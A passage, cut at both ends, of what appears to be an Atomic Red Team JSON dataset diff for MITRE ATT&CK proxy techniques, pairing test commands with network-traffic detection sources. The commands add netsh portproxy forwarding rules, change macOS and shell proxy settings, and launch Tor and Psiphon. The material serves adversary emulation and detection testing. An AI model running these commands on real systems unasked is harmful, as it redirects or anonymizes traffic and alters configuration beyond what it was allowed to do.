interface portproxy add v4tov4 listenport=#{listenport} connectport=1337 connectaddress=#{connectaddress}", + "netsh interface portproxy add v4tov4 listenport=1337 connectport=#{connectport} connectaddress=#{connectaddress}" + ], + "commands": [ + { + "command": "export #{proxy_scheme}_proxy=127.0.0.1:8080\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "export http_proxy=#{proxy_server}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "networksetup -setwebproxy #{interface} 127.0.0.1 #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} 127.0.0.1 #{proxy_port}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": null, + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "networksetup -setwebproxy Wi-Fi #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy Wi-Fi #{proxy_server} #{proxy_port}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=127.0.0.1", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=1337 connectaddress=#{connectaddress}", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=1337 connectport=#{connectport} connectaddress=#{connectaddress}", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + } + ], + 
"parsed_datasets": [ + { + "attack_technique": "T1090.001", + "display_name": "Proxy: Internal Proxy", + "atomic_tests": [ + { + "name": "Connection Proxy", + "auto_generated_guid": "0ac21132-4485-4212-a681-349e8a6637cd", + "description": "Enable traffic redirection.\n\nNote that this test may conflict with pre-existing system configuration.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "proxy_server": { + "description": "Proxy server URL (host:port)", + "type": "Url", + "default": "127.0.0.1:8080" + }, + "proxy_scheme": { + "description": "Protocol to proxy (http or https)", + "type": "String", + "default": "http" + } + }, + "executor": { + "command": "export #{proxy_scheme}_proxy=#{proxy_server}\n", + "cleanup_command": "unset http_proxy\nunset https_proxy\n", + "name": "sh" + } + }, + { + "name": "Connection Proxy for macOS UI", + "auto_generated_guid": "648d68c1-8bcd-4486-9abe-71c6655b6a2c", + "description": "Enable traffic redirection on macOS UI (not terminal).\nThe test will modify and enable the \"Web Proxy\" and \"Secure Web Proxy\" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.\n\nNote that this test may conflict with pre-existing system configuration.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "proxy_server": { + "description": "Proxy server URL (host)", + "type": "Url", + "default": "127.0.0.1" + }, + "proxy_port": { + "description": "Proxy server port", + "type": "Integer", + "default": 8080 + }, + "interface": { + "description": "Protocol to proxy (http or https)", + "type": "String", + "default": "Wi-Fi" + } + }, + "executor": { + "name": "sh", + "command": "networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}\n", + "cleanup_command": "networksetup -setwebproxystate #{interface} off\nnetworksetup -setsecurewebproxystate #{interface} off \n" + 
} + }, + { + "name": "portproxy reg key", + "auto_generated_guid": "b8223ea9-4be2-44a6-b50a-9657a3d4e72a", + "description": "Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\PortProxy\\v4tov4\nUpon execution there will be a new proxy entry in netsh\nnetsh interface portproxy show all\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "connectaddress": { + "description": "Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer.", + "type": "String", + "default": "127.0.0.1" + }, + "connectport": { + "description": "Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer.", + "type": "String", + "default": "1337" + }, + "listenport": { + "description": "Specifies the IPv4 port, by port number or service name, on which to listen.", + "type": "String", + "default": "1337" + } + }, + "executor": { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}", + "cleanup_command": "netsh interface portproxy delete v4tov4 listenport=#{listenport} -ErrorAction Ignore | Out-Null", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.003", + "command_list": [ + "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\\tor\\Tor\\tor.exe}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "sudo systemctl start tor \n", + "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\\tor\\Tor\\tor.exe}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "source": 
